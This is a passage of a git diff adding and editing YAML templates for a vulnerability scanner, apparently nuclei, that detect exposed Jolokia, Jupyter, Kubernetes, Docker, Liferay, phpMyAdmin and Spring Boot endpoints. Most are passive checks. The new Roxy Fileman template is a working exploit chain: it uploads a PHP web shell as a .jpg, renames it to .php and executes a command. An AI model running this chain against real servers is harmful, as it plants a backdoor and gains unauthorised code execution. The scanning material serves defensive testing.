diff --git a/misconfiguration/jolokia/jolokia-list.yaml b/misconfiguration/jolokia/jolokia-list.yaml
index 84fd749600..a8b325b1ed 100644
--- a/misconfiguration/jolokia/jolokia-list.yaml
+++ b/misconfiguration/jolokia/jolokia-list.yaml
@@ -1,27 +1,28 @@
-id: jolokia-list
-info:
-  name: Jolokia - List
-  author: pussycat0x
-  severity: low
-  reference:
-    - https://thinkloveshare.com/hacking/ssrf_to_rce_with_jolokia_and_mbeans/
-    - https://github.com/laluka/jolokia-exploitation-toolkit
-  tags: jolokia,springboot,tomcat
-
-requests:
-  - method: GET
-    path:
-      - "{{BaseURL}}/jolokia/list"
-      - "{{BaseURL}}/actuator/jolokia/list"
-
-    stop-at-first-match: true
-    matchers-condition: and
-    matchers:
-      - type: status
-        status:
-          - 200
-
-      - type: word
-        part: body
-        words:
-          - '"type":"list"'
\ No newline at end of file
+id: jolokia-list
+
+info:
+  name: Jolokia - List
+  author: pussycat0x
+  severity: low
+  reference:
+    - https://thinkloveshare.com/hacking/ssrf_to_rce_with_jolokia_and_mbeans/
+    - https://github.com/laluka/jolokia-exploitation-toolkit
+  tags: jolokia,springboot,tomcat
+
+requests:
+  - method: GET
+    path:
+      - "{{BaseURL}}/jolokia/list"
+      - "{{BaseURL}}/actuator/jolokia/list"
+
+    stop-at-first-match: true
+    matchers-condition: and
+    matchers:
+      - type: status
+        status:
+          - 200
+
+      - type: word
+        part: body
+        words:
+          - '"type":"list"'
diff --git a/misconfiguration/jolokia/jolokia-mbean-search.yaml b/misconfiguration/jolokia/jolokia-mbean-search.yaml
index 29b65a3413..d105f9e1bd 100644
--- a/misconfiguration/jolokia/jolokia-mbean-search.yaml
+++ b/misconfiguration/jolokia/jolokia-mbean-search.yaml
@@ -1,29 +1,30 @@
-id: jolokia-mbean-search
-info:
-  name: Jolokia - Searching MBeans
-  author: pussycat0x
-  severity: low
-  reference:
-    - https://thinkloveshare.com/hacking/ssrf_to_rce_with_jolokia_and_mbeans/
-    - https://github.com/laluka/jolokia-exploitation-toolkit
-  tags: jolokia,springboot,mbean,tomcat
-
-requests:
-  - method: GET
-    path:
-      - "{{BaseURL}}/jolokia/search/*:test=test"
-      - "{{BaseURL}}/actuator/jolokia/search/*:test=test"
-
-    stop-at-first-match: true
-    matchers-condition: and
-    matchers:
-      - type: status
-        status:
-          - 200
-
-      - type: word
-        part: body
-        words:
-          - '"type":"search"'
-          - '"value":'
-        condition: and
\ No newline at end of file
+id: jolokia-mbean-search
+
+info:
+  name: Jolokia - Searching MBeans
+  author: pussycat0x
+  severity: low
+  reference:
+    - https://thinkloveshare.com/hacking/ssrf_to_rce_with_jolokia_and_mbeans/
+    - https://github.com/laluka/jolokia-exploitation-toolkit
+  tags: jolokia,springboot,mbean,tomcat
+
+requests:
+  - method: GET
+    path:
+      - "{{BaseURL}}/jolokia/search/*:test=test"
+      - "{{BaseURL}}/actuator/jolokia/search/*:test=test"
+
+    stop-at-first-match: true
+    matchers-condition: and
+    matchers:
+      - type: status
+        status:
+          - 200
+
+      - type: word
+        part: body
+        words:
+          - '"type":"search"'
+          - '"value":'
+        condition: and
diff --git a/misconfiguration/jolokia/jolokia-unauthenticated-lfi.yaml b/misconfiguration/jolokia/jolokia-unauthenticated-lfi.yaml
index ca0f994111..67f1b04ce9 100644
--- a/misconfiguration/jolokia/jolokia-unauthenticated-lfi.yaml
+++ b/misconfiguration/jolokia/jolokia-unauthenticated-lfi.yaml
@@ -1,13 +1,17 @@
 id: jolokia-unauthenticated-lfi
 
 info:
-  name: Jolokia - Unauthenticated Local File Read
+  name: Jolokia - Local File Inclusion
   author: dhiyaneshDk
   severity: high
-  description: This exploit allow you to File read with compilerDirectivesAdd
+  description: Jolokia is vulnerable to local file inclusion via compilerDirectivesAdd.
   reference:
     - https://thinkloveshare.com/hacking/ssrf_to_rce_with_jolokia_and_mbeans/
     - https://github.com/laluka/jolokia-exploitation-toolkit
+  classification:
+    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:L
+    cvss-score: 8.3
+    cwe-id: CWE-522
   tags: jolokia,springboot,tomcat,lfi
 
 requests:
@@ -28,4 +32,6 @@ requests:
 
       - type: status
         status:
-          - 200
\ No newline at end of file
+          - 200
+
+# Enhanced by mp on 2022/08/03
diff --git a/misconfiguration/jupyter-ipython-unauth.yaml b/misconfiguration/jupyter-ipython-unauth.yaml
index c2b980f407..7ea15f99a0 100644
--- a/misconfiguration/jupyter-ipython-unauth.yaml
+++ b/misconfiguration/jupyter-ipython-unauth.yaml
@@ -1,11 +1,15 @@
 id: jupyter-ipython-unauth
 
 info:
-  name: Jupyter ipython Unauth
+  name: Jupyter ipython - Authorization Bypass
   author: pentest_swissky
   severity: critical
-  description: Unauthenticated access to Jupyter instance
-  tags: unauth
+  description: Jupyter was able to be accessed without authentication.
+  classification:
+    cvss-score: 10.0
+    cvss-metrics: AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
+    cwe-id: CWE-288
+  tags: unauth,jupyter
 
 requests:
   - method: GET
@@ -21,4 +25,6 @@ requests:
         words:
           - ipython/static/components
           - ipython/kernelspecs
-        part: body
\ No newline at end of file
+        part: body
+
+# Enhanced by mp on 2022/05/20
diff --git a/misconfiguration/jupyter-notebooks-exposed.yaml b/misconfiguration/jupyter-notebooks-exposed.yaml
new file mode 100644
index 0000000000..cc33b9b42d
--- /dev/null
+++ b/misconfiguration/jupyter-notebooks-exposed.yaml
@@ -0,0 +1,31 @@
+id: jupyter-notebooks-exposed
+
+info:
+  name: Jupyter notebooks exposed to reading and writing
+  author: johnk3r
+  severity: High
+  reference:
+    - https://blog.aquasec.com/python-ransomware-jupyter-notebook
+  metadata:
+    shodan-query: title:"Home Page - Select or create a notebook"
+  tags: jupyter,misconfig
+
+requests:
+  - method: GET
+    path:
+      - "{{BaseURL}}"
+
+    redirects: true
+    max-redirects: 1
+    matchers-condition: and
+    matchers:
+      - type: status
+        status:
+          - 200
+
+      - type: word
+        part: body
+        words:
+          - '<title>Home Page - Select or create a notebook</title>'
+          - '<div> There are no notebooks running. </div>'
+        condition: or
diff --git a/misconfiguration/kubernetes/kubernetes-pods.yaml b/misconfiguration/kubernetes/kubernetes-pods.yaml
index 310bec3667..3041df2584 100644
--- a/misconfiguration/kubernetes/kubernetes-pods.yaml
+++ b/misconfiguration/kubernetes/kubernetes-pods.yaml
@@ -1,11 +1,12 @@
 id: kubernetes-pods-api
 
 info:
-  name: Kubernetes Pods API
+  name: Kubernetes Pods - API Discovery & Remote Code Execution
   author: ilovebinbash,geeknik,0xtavian
   severity: critical
-  description: When the service port is available, anyone can execute commands inside the container. See https://github.com/officialhocc/Kubernetes-Kubelet-RCE for inspiration.
+  description: A Kubernetes Pods API was discovered. When the service port is available, unauthenticated users can execute commands inside the container.
   reference:
+    - https://github.com/officialhocc/Kubernetes-Kubelet-RCE
     - https://blog.binaryedge.io/2018/12/06/kubernetes-being-hijacked-worldwide/
   tags: k8,unauth,kubernetes,devops
 
@@ -29,3 +30,5 @@ requests:
       - type: status
         status:
           - 200
+
+# Enhanced by mp on 2022/05/20
diff --git a/misconfiguration/laravel-debug-enabled.yaml b/misconfiguration/laravel-debug-enabled.yaml
index 6ccbc892bb..6b550771cc 100644
--- a/misconfiguration/laravel-debug-enabled.yaml
+++ b/misconfiguration/laravel-debug-enabled.yaml
@@ -4,7 +4,10 @@ info:
   name: Laravel Debug Enabled
   author: notsoevilweasel
   severity: medium
-  description: Laravel with APP_DEBUG set to true is prone to show verbose errors.
+  description: |
+    Laravel with APP_DEBUG set to true is prone to show verbose errors.
+  remediation: |
+    Disable Laravel's debug mode by setting APP_DEBUG to false.
   tags: debug,laravel,misconfig
 
 requests:
@@ -15,6 +18,7 @@ requests:
     matchers-condition: and
     matchers:
       - type: word
+        part: body
         words:
           - can_execute_commands
 
diff --git a/misconfiguration/liferay/liferay-api.yaml b/misconfiguration/liferay/liferay-api.yaml
new file mode 100644
index 0000000000..80b0da9747
--- /dev/null
+++ b/misconfiguration/liferay/liferay-api.yaml
@@ -0,0 +1,32 @@
+id: liferay-api
+
+info:
+  name: Liferay /api/liferay - API Exposed
+  author: DhiyaneshDk
+  severity: info
+  metadata:
+    verified: true
+    shodan-query: title:"Liferay"
+  reference: https://github.com/ilmila/J2EEScan/blob/master/src/main/java/burp/j2ee/issues/impl/LiferayAPI.java
+  tags: liferay,exposure,api
+
+requests:
+  - method: GET
+    path:
+      - "{{BaseURL}}/api/liferay"
+
+    matchers-condition: and
+    matchers:
+      - type: regex
+        part: body
+        regex:
+          - ".*Internal Server Error.*An error occurred while accessing the requested resource\\..*"
+
+      - type: word
+        part: header
+        words:
+          - "text/html"
+
+      - type: status
+        status:
+          - 404
diff --git a/misconfiguration/liferay/liferay-axis.yaml b/misconfiguration/liferay/liferay-axis.yaml
new file mode 100644
index 0000000000..72f65b8e45
--- /dev/null
+++ b/misconfiguration/liferay/liferay-axis.yaml
@@ -0,0 +1,32 @@
+id: liferay-axis
+
+info:
+  name: Liferay /api/axis - API Exposed
+  author: DhiyaneshDk
+  severity: info
+  reference: https://github.com/ilmila/J2EEScan/blob/master/src/main/java/burp/j2ee/issues/impl/LiferayAPI.java
+  metadata:
+    verified: true
+    shodan-query: title:"Liferay"
+  tags: misconfig,exposure,liferay,api
+
+requests:
+  - method: GET
+    path:
+      - "{{BaseURL}}/api/axis"
+
+    matchers-condition: and
+    matchers:
+      - type: regex
+        part: body
+        regex:
+          - ".*<h2>And now\\.\\.\\. Some Services<\\/h2>.*"
+
+      - type: word
+        part: header
+        words:
+          - "text/html"
+
+      - type: status
+        status:
+          - 200
diff --git a/misconfiguration/liferay/liferay-jsonws.yaml b/misconfiguration/liferay/liferay-jsonws.yaml
new file mode 100644
index 0000000000..28c93de8c4
--- /dev/null
+++ b/misconfiguration/liferay/liferay-jsonws.yaml
@@ -0,0 +1,32 @@
+id: liferay-jsonws
+
+info:
+  name: Liferay /api/jsonws - API Exposed
+  author: DhiyaneshDk
+  severity: low
+  metadata:
+    verified: true
+    shodan-query: title:"Liferay"
+  reference: https://github.com/ilmila/J2EEScan/blob/master/src/main/java/burp/j2ee/issues/impl/LiferayAPI.java
+  tags: liferay,exposure,api
+
+requests:
+  - method: GET
+    path:
+      - "{{BaseURL}}/api/jsonws"
+
+    matchers-condition: and
+    matchers:
+      - type: regex
+        part: body
+        regex:
+          - ".*<title>json-web-services-api<\\/title>.*"
+
+      - type: word
+        part: header
+        words:
+          - "text/html"
+
+      - type: status
+        status:
+          - 200
diff --git a/misconfiguration/misconfigured-docker.yaml b/misconfiguration/misconfigured-docker.yaml
index f8654a5d7e..79d1061031 100644
--- a/misconfiguration/misconfigured-docker.yaml
+++ b/misconfiguration/misconfigured-docker.yaml
@@ -1,9 +1,10 @@
 id: misconfigured-docker
 
 info:
-  name: Misconfigured Docker on Default Port
+  name: Docker Container - Misconfiguration Exposure
   author: dhiyaneshDK
   severity: critical
+  description: A Docker container misconfiguration was discovered. The Docker daemon can listen for Docker Engine API requests via three different types of Socket - unix, tcp, and fd. With tcp enabled, the default setup provides un-encrypted and un-authenticated direct access to the Docker daemon. It is conventional to use port 2375 for un-encrypted, and port 2376 for encrypted communication with the daemon.
   reference:
     - https://madhuakula.com/content/attacking-and-auditing-docker-containers-using-opensource/attacking-docker-containers/misconfiguration.html
   tags: docker,unauth,devops
@@ -25,3 +26,5 @@ requests:
       - type: status
         status:
           - 200
+
+# Enhanced by mp on 2022/05/20
diff --git a/misconfiguration/openbmcs/openbmcs-secret-disclosure.yaml b/misconfiguration/openbmcs/openbmcs-secret-disclosure.yaml
index a51ab5b011..d9df6909f2 100644
--- a/misconfiguration/openbmcs/openbmcs-secret-disclosure.yaml
+++ b/misconfiguration/openbmcs/openbmcs-secret-disclosure.yaml
@@ -9,7 +9,7 @@ info:
     - https://www.exploit-db.com/exploits/50671
   metadata:
     shodan-query: http.favicon.hash:1550906681
-  tags: openbmcs,misconfig
+  tags: misconfig,edb,openbmcs
 
 requests:
   - method: GET
diff --git a/misconfiguration/openbmcs/openbmcs-ssrf.yaml b/misconfiguration/openbmcs/openbmcs-ssrf.yaml
index ec55601a6f..056c13dd63 100644
--- a/misconfiguration/openbmcs/openbmcs-ssrf.yaml
+++ b/misconfiguration/openbmcs/openbmcs-ssrf.yaml
@@ -12,7 +12,7 @@ info:
     - https://www.exploit-db.com/exploits/50670
   metadata:
     shodan-query: http.favicon.hash:1550906681
-  tags: ssrf,oast,openbmcs
+  tags: ssrf,oast,openbmcs,edb
 
 requests:
   - raw:
diff --git a/misconfiguration/pghero-dashboard-exposure.yaml b/misconfiguration/pghero-dashboard-exposure.yaml
new file mode 100644
index 0000000000..2c789ee6d1
--- /dev/null
+++ b/misconfiguration/pghero-dashboard-exposure.yaml
@@ -0,0 +1,27 @@
+id: pghero-dashboard-exposure
+
+info:
+  name: PgHero Dashboard Exposure
+  author: DhiyaneshDk
+  severity: low
+  reference:
+    - https://github.com/ankane/pghero
+  metadata:
+    verified: true
+    shodan-query: title:"PgHero"
+  tags: exposure,panel,pghero
+
+requests:
+  - method: GET
+    path:
+      - "{{BaseURL}}/connections"
+
+    matchers-condition: and
+    matchers:
+      - type: word
+        words:
+          - "<title>PgHero / Connections</title>"
+
+      - type: status
+        status:
+          - 200
diff --git a/misconfiguration/php-errors.yaml b/misconfiguration/php-errors.yaml
index 15eb3a0b43..9302458632 100644
--- a/misconfiguration/php-errors.yaml
+++ b/misconfiguration/php-errors.yaml
@@ -4,9 +4,8 @@ info:
   name: PHP errors
   author: w4cky_,geeknik,dhiyaneshDK
   severity: info
-  reference:
-    - https://www.shodan.io/search?query=%22Fatal+error%22
-    - https://www.shodan.io/search?query=http.title%3A%22PHP+warning%22
+  metadata:
+    shodan-query: http.title:"PHP warning" || "Fatal error"
   tags: debug,php
 
 requests:
diff --git a/misconfiguration/phpmyadmin/phpmyadmin-setup.yaml b/misconfiguration/phpmyadmin/phpmyadmin-setup.yaml
index f4772ed916..c265d7b346 100644
--- a/misconfiguration/phpmyadmin/phpmyadmin-setup.yaml
+++ b/misconfiguration/phpmyadmin/phpmyadmin-setup.yaml
@@ -2,8 +2,11 @@ id: phpmyadmin-setup
 
 info:
   name: Publicly Accessible Phpmyadmin Setup
-  author: sheikhrishad,thevillagehacker
+  author: sheikhrishad,thevillagehacker,Kr1shna4garwal,ArjunChandarana
   severity: medium
+  metadata:
+    verified: true
+    shodan-query: http.html:"phpMyAdmin"
   tags: phpmyadmin,misconfig
 
 requests:
@@ -19,11 +22,14 @@ requests:
       - "{{BaseURL}}/sysadmin/phpMyAdmin/scripts/setup.php"
       - "{{BaseURL}}/phpmyadmin/setup/index.php"
       - "{{BaseURL}}/pma/setup/index.php"
+      - "{{BaseURL}}/phpmyadmin/setup/"
+      - "{{BaseURL}}/setup/index.php"
 
     stop-at-first-match: true
     matchers-condition: and
     matchers:
       - type: word
+        part: body
         words:
           - "You want to configure phpMyAdmin using web interface"
           - "<title>phpMyAdmin setup</title>"
diff --git a/misconfiguration/phpmyadmin/phpmyadmin-sql.php-server.yaml b/misconfiguration/phpmyadmin/phpmyadmin-sql.php-server.yaml
index 1c7b5d16fb..868f54eace 100644
--- a/misconfiguration/phpmyadmin/phpmyadmin-sql.php-server.yaml
+++ b/misconfiguration/phpmyadmin/phpmyadmin-sql.php-server.yaml
@@ -11,7 +11,7 @@ info:
     cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N
     cvss-score: 5.3
     cwe-id: CWE-200
-  tags: phpmyadmin,misconfig
+  tags: phpmyadmin,misconfig,edb
 
 requests:
   - method: GET
diff --git a/misconfiguration/python-metrics.yaml b/misconfiguration/python-metrics.yaml
index 93bdf54d0f..c4c3064f6d 100644
--- a/misconfiguration/python-metrics.yaml
+++ b/misconfiguration/python-metrics.yaml
@@ -6,8 +6,9 @@ info:
   severity: low
   description: Information Disclosure of Garbage Collection
   reference:
-    - https://www.shodan.io/search?query=html%3A%22python_gc_objects_collected_total%22
     - https://gist.github.com/ruanbekker/e5b1e7895f62b020ff29b5f40767190c
+  metadata:
+    shodan-query: html:"python_gc_objects_collected_total"
   tags: exposure,devops,python
 
 requests:
diff --git a/misconfiguration/rack-mini-profiler.yaml b/misconfiguration/rack-mini-profiler.yaml
index 78ca392d9d..d1d3004841 100644
--- a/misconfiguration/rack-mini-profiler.yaml
+++ b/misconfiguration/rack-mini-profiler.yaml
@@ -1,9 +1,10 @@
 id: rack-mini-profiler
 
 info:
-  name: rack-mini-profiler environment information disclosure
+  name: rack-mini-profiler - Environment Information Disclosure
   author: vzamanillo
   severity: high
+  description: rack-mini-profiler is prone to environmental information disclosure which could help an attacker formulate additional attacks.
   tags: config,debug,rails
 
 requests:
@@ -20,3 +21,5 @@ requests:
       - type: status
         status:
           - 200
+
+# Enhanced by mp on 2022/07/21
diff --git a/misconfiguration/roxyfileman-fileupload.yaml b/misconfiguration/roxyfileman-fileupload.yaml
new file mode 100644
index 0000000000..e11fe7176b
--- /dev/null
+++ b/misconfiguration/roxyfileman-fileupload.yaml
@@ -0,0 +1,82 @@
+id: roxyfileman-fileupload
+
+info:
+  name: Roxy Fileman 1.4.4 - Arbitrary File Upload
+  author: DhiyaneshDK
+  severity: critical
+  description: |
+    The Roxy File Manager has a configuration setting named FORBIDDEN_UPLOADS,which keeps a list of forbidden file extensions that the application will not allow to be uploaded. This configuration setting is also checked when renaming an existing file to a new file extension.It is possible to bypass this check and rename already uploaded files to any extension, using the move function as this function does not perform any checks.
+  reference:
+    - https://www.exploit-db.com/exploits/39963
+  metadata:
+    verified: "true"
+    google-query: intitle:"Roxy file manager"
+  tags: intrusive,misconfig,edb,roxy,fileman,rce,fileupload
+
+requests:
+  - raw:
+      - |
+        POST /php/upload.php HTTP/1.1
+        Host: {{Hostname}}
+        Content-Type: multipart/form-data; boundary=----WebKitFormBoundary6rbEqFAMRkE0RAB7
+
+        ------WebKitFormBoundary6rbEqFAMRkE0RAB7
+        Content-Disposition: form-data; name="action"
+
+        upload
+        ------WebKitFormBoundary6rbEqFAMRkE0RAB7
+        Content-Disposition: form-data; name="method"
+
+        ajax
+        ------WebKitFormBoundary6rbEqFAMRkE0RAB7
+        Content-Disposition: form-data; name="d"
+
+        /app/Uploads
+        ------WebKitFormBoundary6rbEqFAMRkE0RAB7
+        Content-Disposition: form-data; name="files[]"; filename="{{randstr}}.jpg"
+        Content-Type: image/jpeg
+
+        <?php
+        echo exec($_GET["cmd"]);
+        ?>
+
+        ------WebKitFormBoundary6rbEqFAMRkE0RAB7--
+
+      - |
+        POST /php/renamefile.php?f=%2Fapp%2FUploads%2F{{randstr}}.jpg&n={{randstr}}.php HTTP/1.1
+        Host: {{Hostname}}
+        Content-Type: application/x-www-form-urlencoded; charset=UTF-8
+        X-Requested-With: XMLHttpRequest
+
+        f=%2Fapp%2FUploads%2F{{randstr}}.jpg&n={{randstr}}.php
+
+      - |
+        POST /php/movefile.php?f=%2Fapp%2FUploads%2F{{randstr}}.jpg&n=%2Fapp%2FUploads%2F{{randstr}}.php HTTP/1.1
+        Host: {{Hostname}}
+        Content-Type: application/x-www-form-urlencoded; charset=UTF-8
+        X-Requested-With: XMLHttpRequest
+
+        f=%2Fapp%2FUploads%2F{{randstr}}.jpg&n=%2Fapp%2FUploads%2F{{randstr}}.php
+
+      - |
+        GET /Uploads/{{randstr}}.php?cmd=echo+"roxyfileman"+|+rev HTTP/1.1
+        Host: {{Hostname}}
+
+    cookie-reuse: true
+    redirects: true
+    max-redirects: 2
+    matchers-condition: and
+    matchers:
+      - type: regex
+        part: body
+        regex:
+          - "namelifyxor"
+
+      - type: word
+        part: header
+        words:
+          - text/html
+
+      - type: status
+        status:
+          - 200
diff --git a/misconfiguration/salesforce-aura.yaml b/misconfiguration/salesforce-aura.yaml
index 004b13149f..5e38d4dfd4 100644
--- a/misconfiguration/salesforce-aura.yaml
+++ b/misconfiguration/salesforce-aura.yaml
@@ -2,10 +2,11 @@ id: salesforce-aura
 
 info:
   name: Detect the exposure of Salesforce Lightning aura API
-  author: aaron_costello (@ConspiracyProof)
+  author: aaron_costello (@ConspiracyProof),Ph33rr
   severity: info
   reference:
     - https://www.enumerated.de/index/salesforce
+    - https://github.com/Ph33rr/cirrusgo (test endpoint)
   tags: aura,unauth,salesforce,exposure
 
 requests:
@@ -14,6 +15,8 @@ requests:
       - "{{BaseURL}}/aura"
       - "{{BaseURL}}/s/sfsites/aura"
       - "{{BaseURL}}/sfsites/aura"
+      - "{{BaseURL}}/s/aura"
+      - "{{BaseURL}}/s/fact"
 
     body: "{}"
 
diff --git a/misconfiguration/sap/sap-netweaver-info-leak.yaml b/misconfiguration/sap/sap-netweaver-info-leak.yaml
index 98c45f2eb3..e0aebaf1bb 100644
--- a/misconfiguration/sap/sap-netweaver-info-leak.yaml
+++ b/misconfiguration/sap/sap-netweaver-info-leak.yaml
@@ -8,6 +8,8 @@ info:
   reference:
     - https://www.acunetix.com/vulnerabilities/web/sap-icf-sap-public-info-sensitive-information-disclosure/
     - https://github.com/Jean-Francois-C/SAP-Security-Audit
+  metadata:
+    shodan-query: http.favicon.hash:-266008933
   tags: sap
 
 requests:
diff --git a/misconfiguration/selenium-exposure.yaml b/misconfiguration/selenium-exposure.yaml
new file mode 100644
index 0000000000..af42e461ec
--- /dev/null
+++ b/misconfiguration/selenium-exposure.yaml
@@ -0,0 +1,36 @@
+id: selenium-exposure
+
+info:
+  name: Selenium - Node Exposure
+  author: w0Tx
+  severity: high
+  description: |
+    Selenium was shown to have an exposed node. If a Selenium node is exposed without any form of authentication, remote command execution could be possible if chromium is configured. By default the port is 4444, still, most of the internet facing are done through reverse proxies.
+  reference:
+    - https://nutcrackerssecurity.github.io/selenium.html
+    - https://labs.detectify.com/2017/10/06/guest-blog-dont-leave-your-grid-wide-open/
+  metadata:
+    verified: true
+    shodan-query: "/wd/hub"
+  tags: selenium,misconfiguration,rce,chromium
+
+requests:
+  - method: GET
+    path:
+      - "{{BaseURL}}/wd/hub"
+
+    redirects: true
+    max-redirects: 2
+    matchers-condition: and
+    matchers:
+      - type: word
+        words:
+          - 'WebDriverRequest'
+          - '<title>WebDriver Hub</title>'
+        condition: or
+
+      - type: status
+        status:
+          - 200
+
+# Enhanced by mp on 2022/07/21
diff --git a/misconfiguration/server-status.yaml b/misconfiguration/server-status.yaml
new file mode 100644
index 0000000000..b1ac77e191
--- /dev/null
+++ b/misconfiguration/server-status.yaml
@@ -0,0 +1,33 @@
+id: server-status
+
+info:
+  name: ServerStatus Exposure
+  author: DhiyaneshDK
+  severity: info
+  reference:
+    - https://www.facebook.com/ExWareLabs/photos/a.361854183878462/5527767173953778/
+  metadata:
+    verified: true
+    shodan-query: title:"ServerStatus"
+  tags: misconfig,serverstatus
+
+requests:
+  - method: GET
+    path:
+      - '{{BaseURL}}'
+
+    matchers-condition: and
+    matchers:
+      - type: word
+        part: body
+        words:
+          - '<title>ServerStatus</title>'
+
+      - type: word
+        part: header
+        words:
+          - text/html
+
+      - type: status
+        status:
+          - 200
diff --git a/misconfiguration/service-pwd.yaml b/misconfiguration/service-pwd.yaml
index 3b8299cb1e..1f9c0ef5da 100644
--- a/misconfiguration/service-pwd.yaml
+++ b/misconfiguration/service-pwd.yaml
@@ -1,13 +1,13 @@
 id: service-pwd
 
 info:
-  name: Service password file
+  name: service.pwd - Sensitive Information Disclosure
   author: pussycat0x
   severity: high
-  description: Searches for sensitive service.pwd file.
+  description: service.pwd was discovered, which is likely to contain sensitive information.
   reference:
     - https://www.exploit-db.com/ghdb/7256
-  tags: exposure,listing,service
+  tags: exposure,listing,service,edb
 
 requests:
   - method: GET
@@ -24,3 +24,5 @@ requests:
       - type: status
         status:
           - 200
+
+# Enhanced by mp on 2022/07/21
diff --git a/misconfiguration/shell-history.yaml b/misconfiguration/shell-history.yaml
index ead738ea5c..30a08a0057 100644
--- a/misconfiguration/shell-history.yaml
+++ b/misconfiguration/shell-history.yaml
@@ -1,51 +1,50 @@
-id: shell-history
+id: shell-history
 
-info:
-  name: Shell History
-  author: pentest_swissky,geeknik
-  severity: low
-  description: Discover history for bash, ksh, sh, and zsh
-  tags: config
+info:
+  name: Shell History
+  author: pentest_swissky,geeknik
+  severity: low
+  description: Discover history for bash, ksh, sh, and zsh
+  tags: misconfig
 
-requests:
-  - method: GET
-    redirects: true
-    max-redirects: 1
-    path:
-      - "{{BaseURL}}/.bash_history"
-      - "{{BaseURL}}/.ksh_history"
-      - "{{BaseURL}}/.sh_history"
-      - "{{BaseURL}}/.zsh_history"
-
-    matchers-condition: and
-    matchers:
-      - type: word
-        words:
-          - "ls"
-          - "mkdir "
-          - "chmod "
-          - "mv "
-          - "nano "
-          - "vim "
-          - "pico "
-          - "sudo "
-          - "cd "
-          - "cp "
-          - "ps aux "
-        condition: or
-
-      - type: status
-        status:
-          - 200
-
-      - type: word
-        words:
-          - "<?xml"
-          - "<env"
-          - "application/javascript"
-          - "application/json"
-          - "application/xml"
-          - "html>"
-          - "text/html"
-        part: response
-        negative: true
+requests:
+  - method: GET
+    max-redirects: 1
+    path:
+      - "{{BaseURL}}/.bash_history"
+      - "{{BaseURL}}/.ksh_history"
+      - "{{BaseURL}}/.sh_history"
+      - "{{BaseURL}}/.zsh_history"
+
+    matchers-condition: and
+    matchers:
+      - type: word
+        words:
+          - "ls"
+          - "mkdir "
+          - "chmod "
+          - "mv "
+          - "nano "
+          - "vim "
+          - "pico "
+          - "sudo "
+          - "cd "
+          - "cp "
+          - "ps aux "
+        condition: or
+
+      - type: word
+        words:
+          - "<?xml"
+          - "<env"
+          - "application/javascript"
+          - "application/json"
+          - "application/xml"
+          - "html>"
+          - "text/html"
+        part: response
+        negative: true
+
+      - type: status
+        status:
+          - 200
diff --git a/misconfiguration/skycaiji-install.yaml b/misconfiguration/skycaiji-install.yaml
index 4edf4869d7..9affe49ded 100644
--- a/misconfiguration/skycaiji-install.yaml
+++ b/misconfiguration/skycaiji-install.yaml
@@ -1,9 +1,10 @@
 id: skycaiji-install
 
 info:
-  name: SkyCaiji Exposed Installation
+  name: SkyCaiji - Exposed Installation
   author: pikpikcu
   severity: high
+  description: SkyCaiji was discovered.
   tags: tech,skycaiji,exposure,misconfig
 
 requests:
@@ -24,3 +25,5 @@ requests:
       - type: status
         status:
           - 200
+
+# Enhanced by mp on 2022/07/21
diff --git a/misconfiguration/solr-query-dashboard.yaml b/misconfiguration/solr-query-dashboard.yaml
index f36e4e3316..6b283fb2f0 100644
--- a/misconfiguration/solr-query-dashboard.yaml
+++ b/misconfiguration/solr-query-dashboard.yaml
@@ -1,12 +1,13 @@
 id: solr-admin-query
 
 info:
-  name: Solr Admin Query Page
+  name: Solr - Admin Page Access
   author: dhiyaneshDK
   severity: high
+  description: Solr's admin page was able to be accessed with no authentication requirements in place.
   reference:
     - https://www.exploit-db.com/ghdb/5856
-  tags: solr,unauth
+  tags: solr,unauth,edb
 
 requests:
   - method: GET
@@ -23,3 +24,5 @@ requests:
       - type: status
         status:
           - 200
+
+# Enhanced by mp on 2022/07/21
diff --git a/misconfiguration/spidercontrol-scada-server-info.yaml b/misconfiguration/spidercontrol-scada-server-info.yaml
index 19ff108ebd..6280f9f8ea 100644
--- a/misconfiguration/spidercontrol-scada-server-info.yaml
+++ b/misconfiguration/spidercontrol-scada-server-info.yaml
@@ -1,10 +1,10 @@
 id: spidercontrol-scada-server-info
 
 info:
-  name: SpiderControl SCADA Web Server Info Exposure
+  name: SpiderControl SCADA Web Server - Sensitive Information Exposure
   author: geeknik
   severity: high
-  description: Numerous, market-leading OEM manufacturers - from a wide variety of industries - rely on SpiderControl.
+  description: SpiderControl SCADA Web Server is vulnerable to sensitive information exposure. Numerous, market-leading OEM manufacturers - from a wide variety of industries - rely on SpiderControl.
   reference:
     - https://spidercontrol.net/spidercontrol-inside/
   tags: spidercontrol,scada,exposure
@@ -29,3 +29,5 @@ requests:
         part: header
         kval:
           - Server
+
+# Enhanced by mp on 2022/07/21
diff --git a/misconfiguration/springboot/springboot-autoconfig.yaml b/misconfiguration/springboot/springboot-autoconfig.yaml
index e120711b1e..b72ab5a4a1 100644
--- a/misconfiguration/springboot/springboot-autoconfig.yaml
+++ b/misconfiguration/springboot/springboot-autoconfig.yaml
@@ -13,6 +13,7 @@ requests:
       - "{{BaseURL}}/autoconfig"
       - "{{BaseURL}}/actuator/autoconfig"
 
+    stop-at-first-match: true
     matchers-condition: and
     matchers:
       - type: word
diff --git a/misconfiguration/springboot/springboot-beans.yaml b/misconfiguration/springboot/springboot-beans.yaml
index bc42a55309..d012acdc51 100644
--- a/misconfiguration/springboot/springboot-beans.yaml
+++ b/misconfiguration/springboot/springboot-beans.yaml
@@ -12,6 +12,8 @@ requests:
     path:
       - "{{BaseURL}}/beans"
       - "{{BaseURL}}/actuator/beans"
+
+    stop-at-first-match: true
     matchers-condition: and
     matchers:
       - type: word
diff --git a/misconfiguration/springboot/springboot-caches.yaml b/misconfiguration/springboot/springboot-caches.yaml
new file mode 100644
index 0000000000..8b04409419
--- /dev/null
+++ b/misconfiguration/springboot/springboot-caches.yaml
@@ -0,0 +1,39 @@
+id: springboot-caches
+
+info:
+  name: Springboot Actuator Caches
+  author: ELSFA7110
+  severity: low
+  description: The caches endpoint provides access to the application's caches.
+  reference:
+    - https://docs.spring.io/spring-boot/docs/current/actuator-api/htmlsingle/#caches
+  metadata:
+    verified: true
+  tags: misconfig,springboot,exposure
+
+requests:
+  - method: GET
+    path:
+      - "{{BaseURL}}/caches"
+      - "{{BaseURL}}/actuator/caches"
+
+    stop-at-first-match: true
+    matchers-condition: and
+    matchers:
+      - type: word
+        part: body
